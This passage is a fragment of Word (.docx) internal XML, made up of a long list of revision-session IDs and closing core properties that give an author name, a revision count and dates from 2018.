    <w:rsid w:val="00E02F48"/>
    <w:rsid w:val="00E058D3"/>
    <w:rsid w:val="00E1259D"/>
    <w:rsid w:val="00E152A1"/>
    <w:rsid w:val="00E157A1"/>
    <w:rsid w:val="00E15DCF"/>
    <w:rsid w:val="00E169DD"/>
    <w:rsid w:val="00E1752C"/>
    <w:rsid w:val="00E20126"/>
    <w:rsid w:val="00E2340D"/>
    <w:rsid w:val="00E25B21"/>
    <w:rsid w:val="00E2613A"/>
    <w:rsid w:val="00E26AB0"/>
    <w:rsid w:val="00E26CDB"/>
    <w:rsid w:val="00E307FA"/>
    <w:rsid w:val="00E3174B"/>
    <w:rsid w:val="00E328C7"/>
    <w:rsid w:val="00E331E3"/>
    <w:rsid w:val="00E3785E"/>
    <w:rsid w:val="00E41062"/>
    <w:rsid w:val="00E42D22"/>
    <w:rsid w:val="00E43268"/>
    <w:rsid w:val="00E43DFC"/>
    <w:rsid w:val="00E45947"/>
    <w:rsid w:val="00E54241"/>
    <w:rsid w:val="00E54980"/>
    <w:rsid w:val="00E55640"/>
    <w:rsid w:val="00E57ECC"/>
    <w:rsid w:val="00E63B3C"/>
    <w:rsid w:val="00E643AD"/>
    <w:rsid w:val="00E663A3"/>
    <w:rsid w:val="00E66423"/>
    <w:rsid w:val="00E66818"/>
    <w:rsid w:val="00E67183"/>
    <w:rsid w:val="00E67E67"/>
    <w:rsid w:val="00E71BF9"/>
    <w:rsid w:val="00E7227C"/>
    <w:rsid w:val="00E72D82"/>
    <w:rsid w:val="00E73F9C"/>
    <w:rsid w:val="00E7447B"/>
    <w:rsid w:val="00E74BFB"/>
    <w:rsid w:val="00E768B4"/>
    <w:rsid w:val="00E80641"/>
    <w:rsid w:val="00E830F2"/>
    <w:rsid w:val="00E86F8A"/>
    <w:rsid w:val="00E912DC"/>
    <w:rsid w:val="00E91ECD"/>
    <w:rsid w:val="00E92A9E"/>
    <w:rsid w:val="00E92E07"/>
    <w:rsid w:val="00E96014"/>
    <w:rsid w:val="00E964B2"/>
    <w:rsid w:val="00E96B8D"/>
    <w:rsid w:val="00EA068C"/>
    <w:rsid w:val="00EA121A"/>
    <w:rsid w:val="00EA2BCE"/>
    <w:rsid w:val="00EA35F4"/>
    <w:rsid w:val="00EA3903"/>
    <w:rsid w:val="00EA3E86"/>
    <w:rsid w:val="00EA540D"/>
    <w:rsid w:val="00EA5647"/>
    <w:rsid w:val="00EA69BE"/>
    <w:rsid w:val="00EB166B"/>
    <w:rsid w:val="00EB3620"/>
    <w:rsid w:val="00EB3A61"/>
    <w:rsid w:val="00EB6B4E"/>
    <w:rsid w:val="00EB6BDE"/>
    <w:rsid w:val="00EC1253"/>
    <w:rsid w:val="00EC1CCC"/>
    <w:rsid w:val="00EC2D47"/>
    <w:rsid w:val="00EC38FB"/>
    <w:rsid w:val="00ED02A5"/>
    <w:rsid w:val="00ED0A23"/>
    <w:rsid w:val="00ED172B"/>
    <w:rsid w:val="00ED1A39"/>
    <w:rsid w:val="00ED22F5"/>
    <w:rsid w:val="00ED2EAD"/>
    <w:rsid w:val="00ED6F32"/>
    <w:rsid w:val="00ED72B0"/>
    <w:rsid w:val="00ED7F89"/>
    <w:rsid w:val="00EE1C63"/>
    <w:rsid w:val="00EE2E04"/>
    <w:rsid w:val="00EE35BC"/>
    <w:rsid w:val="00EE3A89"/>
    <w:rsid w:val="00EE540C"/>
    <w:rsid w:val="00EE7548"/>
    <w:rsid w:val="00EF0095"/>
    <w:rsid w:val="00EF08C7"/>
    <w:rsid w:val="00EF438B"/>
    <w:rsid w:val="00EF7C06"/>
    <w:rsid w:val="00F01C5D"/>
    <w:rsid w:val="00F01CBA"/>
    <w:rsid w:val="00F01DBA"/>
    <w:rsid w:val="00F02D22"/>
    <w:rsid w:val="00F038A7"/>
    <w:rsid w:val="00F06043"/>
    <w:rsid w:val="00F06128"/>
    <w:rsid w:val="00F078F5"/>
    <w:rsid w:val="00F1093D"/>
    <w:rsid w:val="00F11652"/>
    <w:rsid w:val="00F11743"/>
    <w:rsid w:val="00F11B45"/>
    <w:rsid w:val="00F12817"/>
    <w:rsid w:val="00F12984"/>
    <w:rsid w:val="00F15C5F"/>
    <w:rsid w:val="00F202CD"/>
    <w:rsid w:val="00F225FE"/>
    <w:rsid w:val="00F227A6"/>
    <w:rsid w:val="00F23853"/>
    <w:rsid w:val="00F271CF"/>
    <w:rsid w:val="00F27E67"/>
    <w:rsid w:val="00F30497"/>
    <w:rsid w:val="00F30D14"/>
    <w:rsid w:val="00F333BF"/>
    <w:rsid w:val="00F33569"/>
    <w:rsid w:val="00F34863"/>
    <w:rsid w:val="00F3554B"/>
    <w:rsid w:val="00F35BDA"/>
    <w:rsid w:val="00F3677A"/>
    <w:rsid w:val="00F36BBD"/>
    <w:rsid w:val="00F403D0"/>
    <w:rsid w:val="00F40BBD"/>
    <w:rsid w:val="00F41455"/>
    <w:rsid w:val="00F43C19"/>
    <w:rsid w:val="00F45882"/>
    <w:rsid w:val="00F45E8D"/>
    <w:rsid w:val="00F51626"/>
    <w:rsid w:val="00F53E1A"/>
    <w:rsid w:val="00F564B7"/>
    <w:rsid w:val="00F567FE"/>
    <w:rsid w:val="00F640CC"/>
    <w:rsid w:val="00F64EED"/>
    <w:rsid w:val="00F65C8F"/>
    <w:rsid w:val="00F671F9"/>
    <w:rsid w:val="00F67E34"/>
    <w:rsid w:val="00F7032A"/>
    <w:rsid w:val="00F710BE"/>
    <w:rsid w:val="00F72E1F"/>
    <w:rsid w:val="00F74461"/>
    <w:rsid w:val="00F74A7C"/>
    <w:rsid w:val="00F74EA4"/>
    <w:rsid w:val="00F75D03"/>
    <w:rsid w:val="00F75DDB"/>
    <w:rsid w:val="00F772E8"/>
    <w:rsid w:val="00F77B6F"/>
    <w:rsid w:val="00F8070C"/>
    <w:rsid w:val="00F8118E"/>
    <w:rsid w:val="00F81C61"/>
    <w:rsid w:val="00F82369"/>
    <w:rsid w:val="00F82520"/>
    <w:rsid w:val="00F86075"/>
    <w:rsid w:val="00F87C1E"/>
    <w:rsid w:val="00F90525"/>
    <w:rsid w:val="00F91287"/>
    <w:rsid w:val="00F91907"/>
    <w:rsid w:val="00F929AE"/>
    <w:rsid w:val="00F94FAF"/>
    <w:rsid w:val="00F95190"/>
    <w:rsid w:val="00F95B15"/>
    <w:rsid w:val="00FA0599"/>
    <w:rsid w:val="00FA703F"/>
    <w:rsid w:val="00FB0B90"/>
    <w:rsid w:val="00FB1CB7"/>
    <w:rsid w:val="00FB4B67"/>
    <w:rsid w:val="00FB6C26"/>
    <w:rsid w:val="00FC039D"/>
    <w:rsid w:val="00FC2890"/>
    <w:rsid w:val="00FC3923"/>
    <w:rsid w:val="00FC56C6"/>
    <w:rsid w:val="00FC5706"/>
    <w:rsid w:val="00FC65D9"/>
    <w:rsid w:val="00FC6BA4"/>
    <w:rsid w:val="00FD24B2"/>
    <w:rsid w:val="00FD24DD"/>
    <w:rsid w:val="00FD4252"/>
    <w:rsid w:val="00FD4275"/>
    <w:rsid w:val="00FD4B88"/>
    <w:rsid w:val="00FD51C5"/>
    <w:rsid w:val="00FD5AD0"/>
    <w:rsid w:val="00FD7C27"/>
    <w:rsid w:val="00FE0D0B"/>
    <w:rsid w:val="00FE22B5"/>
    <w:rsid w:val="00FE423C"/>
    <w:rsid w:val="00FE6F4E"/>
    <w:rsid w:val="00FF0D77"/>
    <w:rsid w:val="00FF4622"/>
    <w:rsid w:val="00FF51B4"/>
    <w:rsid w:val="00FF6B5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C6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7D7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AE67-DA94-44B9-B519-851F1BE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0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Xiaohan W</cp:lastModifiedBy>
  <cp:revision>1329</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-09T03:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-14T21:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>